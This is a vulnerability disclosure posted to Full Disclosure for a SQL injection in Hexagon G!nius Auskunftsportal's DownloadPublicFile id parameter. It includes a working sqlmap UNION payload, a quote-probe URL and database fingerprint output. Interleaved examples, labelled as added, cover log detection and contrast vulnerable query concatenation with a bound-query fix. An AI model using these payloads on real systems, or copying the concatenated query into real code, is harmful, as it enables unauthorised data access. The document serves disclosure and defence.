[FD] CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.
- From: Marcel Keiffenheim <marcel@xxxxxxxxxxxxxxx>
- Date: Mon, 10 May 2021 18:12:47 +0200 (CEST)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<div style="" class="default-style">
<div class="default-style">
CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL
injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Additional Information]
<br>PoC Payload (value of the id parameter, as generated by sqlmap's UNION technique):
<br>id=test' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(107)||CHR(112)||CHR(122)||CHR(113)||CHR(107)||CHR(71)||CHR(98)||CHR(88)||CHR(104)||CHR(102)||CHR(99)||CHR(67)||CHR(113)||CHR(109)||CHR(69)||CHR(110)||CHR(67)||CHR(76)||CHR(103)||CHR(84)||CHR(83)||CHR(109)||CHR(121)||CHR(84)||CHR(73)||CHR(116)||CHR(79)||CHR(103)||CHR(87)||CHR(84)||CHR(120)||CHR(119)||CHR(75)||CHR(76)||CHR(114)||CHR(120)||CHR(103)||CHR(85)||CHR(87)||CHR(112)||CHR(111)||CHR(70)||CHR(108)||CHR(73)||CHR(113)||CHR(112)||CHR(113)||CHR(120)||CHR(113),NULL FROM DUAL-- LShX
<br>The CHR() chain concatenates a 50-character marker string (qkpzq ... qpqxq) without sending a quote character; sqlmap searches the response for that marker to locate the output of the injected column. Eleven NULLs, the marker column and one trailing NULL make 13 columns, so the application's own SELECT returns 13 columns; "-- LShX" comments out the rest of the original statement.
</div>
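The two request shapes this PoC implies, a lone quote that provokes an Oracle error and then a UNION ALL SELECT, are what a defender would look for in the web-server access log. The following is an added example, not code from the advisory or from Hexagon: it decodes the CHR() chain of the PoC above, counts the UNION columns, and flags both request shapes over three constructed Apache-style log lines (the IP addresses, timestamps and sizes are made up; the CHR() values are copied from the PoC).

```python
"""Decode the PoC payload and flag quote probes / UNION SELECTs in access logs.
Added example for this advisory, not code from the advisory or from Hexagon;
the log lines are constructed and the CHR() values are copied from the PoC."""
import re
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit

# CHR() arguments exactly as they appear in the PoC payload.
POC_CHR = [113, 107, 112, 122, 113, 107, 71, 98, 88, 104, 102, 99, 67, 113, 109,
           69, 110, 67, 76, 103, 84, 83, 109, 121, 84, 73, 116, 79, 103, 87, 84,
           120, 119, 75, 76, 114, 120, 103, 85, 87, 112, 111, 70, 108, 73, 113,
           112, 113, 120, 113]
POC_ID = ("test' UNION ALL SELECT " + ",".join(["NULL"] * 11) + ","
          + "||".join(f"CHR({n})" for n in POC_CHR) + ",NULL FROM DUAL-- LShX")

# Constructed access-log lines: the error probe, the PoC itself, a benign download.
LOG_LINES = [
    '203.0.113.7 - - [10/May/2021:18:12:47 +0200] "GET /GiPWorkflow/Service/DownloadPublicFile?id=DS%27 HTTP/1.1" 500 412',
    '203.0.113.7 - - [10/May/2021:18:12:49 +0200] "GET /GiPWorkflow/Service/DownloadPublicFile?id='
    + quote(POC_ID, safe="") + ' HTTP/1.1" 200 1337',
    '198.51.100.4 - - [10/May/2021:18:13:02 +0200] "GET /GiPWorkflow/Service/DownloadPublicFile?id=DS HTTP/1.1" 200 8192',
]

REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
UNION_SELECT = re.compile(r"\bUNION(?:\s+ALL)?\s+SELECT\b", re.I)
CHR_CHAIN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))+", re.I)
CHR_NUM = re.compile(r"CHR\((\d+)\)", re.I)


def decode_chr_chains(sql: str) -> str:
    """Replace every CHR(n)||CHR(m)||... chain with the quoted string it builds.
    Tools use the chain so the marker string needs no quote characters."""
    def build(m):
        return "'" + "".join(chr(int(n)) for n in CHR_NUM.findall(m.group(0))) + "'"
    return CHR_CHAIN.sub(build, sql)


def count_union_columns(sql: str) -> int:
    """Columns in the first UNION [ALL] SELECT list, i.e. how many columns the
    application's own query returns (a UNION has to match that count)."""
    m = re.search(r"UNION(?:\s+ALL)?\s+SELECT\s+(.*?)\s+FROM\b", sql, re.I | re.S)
    if not m:
        return 0
    depth, cols = 0, 1
    for ch in m.group(1):          # count top-level commas only
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            cols += 1
    return cols


def analyse_request(line: str) -> Optional[dict]:
    """Return a finding for one access-log line, or None when nothing stands out."""
    m = REQ.search(line)
    if not m:
        return None
    path, status = m.group(1), int(m.group(2))
    for param, values in parse_qs(urlsplit(path).query).items():
        for value in values:       # parse_qs has already URL-decoded the value
            has_quote = "'" in value
            has_union = bool(UNION_SELECT.search(value))
            if not (has_quote or has_union):
                continue
            finding = {"param": param, "status": status,
                       "quote": has_quote, "union": has_union}
            if has_union:
                finding["columns"] = count_union_columns(value)
                finding["decoded"] = decode_chr_chains(value)
            return finding
    return None


if __name__ == "__main__":
    for line in LOG_LINES:
        print(analyse_request(line))
```

A quote in a parameter on its own is noisy (names contain apostrophes); the pairing that matters here is a quoted value followed by a 500 response, then a UNION SELECT from the same client against the same endpoint a few seconds later.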
<div class="default-style">
<br>
</div>
<div class="default-style">
Result:
<br>====
<br>back-end DBMS: Oracle
<br>banner: 'Oracle Database 19c Standard Edition 2 Release 19.0.0.0.0 -
Production'
<br>current user: 'IPA_ADMIN'
<br>current database (equivalent to schema on Oracle): 'IPA_ADMIN'
<br>current user is DBA: False
<br>database management system users [18]:
<br>====
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
Impact:
<br>Complete compromise of the confidentiality of the database contents: any data readable by the application's database account (IPA_ADMIN, not a DBA) can be retrieved without authentication.
</div>
<div class="default-style">
Discovery:
<br>1. Discovered manually
<br>2. Exploited via sqlmap
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Vulnerability Type]
<br>SQL Injection
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Vendor of Product]
<br>Hexagon AG
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Affected Product Code Base]
<br>G!nius Auskunftsportal, all versions before 5.0.0.0 (fixed in 5.0.0.0)
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Affected Component]
<br>DownloadPublicFile component
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Attack Type]
<br>Remote
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Impact Information Disclosure]
<br>true
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
[Attack Vectors]
<br>The web application has a function ("DownloadPublicFile") which
facilitates downloads.
<br>
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
The "id" parameter (used to specify which file is to be downloaded) is
vulnerable to SQL injection.
<br>
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
Because the injection sits in a SELECT executed by an unauthenticated endpoint, a "UNION SELECT" payload
reads arbitrary rows from the Oracle backend, as the IPA_ADMIN account, without any credentials.
<br>
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
Accessing the following URL will trigger an Oracle error message:
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
https://[affected site root]/GiPWorkflow/Service/DownloadPublicFile?id=DS'
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
The apostrophe at the end (Unicode U+0027) closes the string literal in the query the application builds by
concatenating the id value into a hard-coded SQL statement; the resulting Oracle syntax error is returned to the client and confirms the injection point.
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
At this point a "UNION SELECT" payload with a matching column count can be used to read any data
the application's database account can access.
</div>
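The lookup described in the two paragraphs above, written the vulnerable way (id value concatenated into a hard-coded query) next to the bind-variable version that fixes it. This is an added example, not Hexagon's code: the table names, columns and rows are invented, and sqlite3 stands in for the Oracle backend (an Oracle driver takes :id binds the same way). The toy query selects two columns, so the UNION payload here has two; the PoC's column count shows the real query has 13.

```python
"""DownloadPublicFile-style lookup: concatenated query beside a bound query.
Added example, not Hexagon's code; schema and data are constructed and sqlite3
stands in for Oracle."""
import sqlite3

# Hypothetical schema standing in for the real one; contents are constructed.
SCHEMA = """
CREATE TABLE public_files (id TEXT PRIMARY KEY, name TEXT, content BLOB);
CREATE TABLE app_users (login TEXT, pw_hash TEXT);
INSERT INTO public_files VALUES ('DS', 'datenschutz.pdf', x'255044462d');
INSERT INTO app_users VALUES ('ipa_admin', 'constructed-hash-value');
"""

# Two columns because the toy query selects two; the PoC's 11 NULLs plus the
# marker column and a trailing NULL show the real query selects 13.
UNION_PAYLOAD = "x' UNION ALL SELECT login, pw_hash FROM app_users-- "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def download_vulnerable(conn, file_id: str):
    """Before: the id value is spliced into the SQL text, so a quote ends the
    literal and everything after it is parsed as SQL."""
    sql = "SELECT name, content FROM public_files WHERE id = '" + file_id + "'"
    return conn.execute(sql).fetchall()


def download_fixed(conn, file_id: str):
    """After: the id value travels as a bind variable and is never parsed as
    SQL, whatever characters it contains."""
    sql = "SELECT name, content FROM public_files WHERE id = :id"
    return conn.execute(sql, {"id": file_id}).fetchall()


def probe(conn, lookup, file_id: str):
    """Run one lookup and report ('rows', rows) or ('error', message), which is
    what the attacker sees: a database error page versus a normal response."""
    try:
        return ("rows", lookup(conn, file_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for lookup in (download_vulnerable, download_fixed):
        for file_id in ("DS", "DS'", UNION_PAYLOAD):
            print(lookup.__name__, repr(file_id), probe(db, lookup, file_id))
```

With the bound query the quote probe and the UNION payload are simply ids that match no row; the error message that made the injection point discoverable never reaches the client either.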
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Has vendor confirmed or acknowledged the vulnerability?]
<br>true
</div>
<div class="default-style">
A patch has been developed, released and installed to all known instances
of the vulnerability a full six months prior to public disclosure.
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Discoverer]
<br>Marcel Keiffenheim
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Reference]
<br>https://www.hexagonsafetyinfrastructure.com/products/utilities-and-communications-products/advanced-utility-gis/hexagon-ginius
</div>
</div>
</body>
</html>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/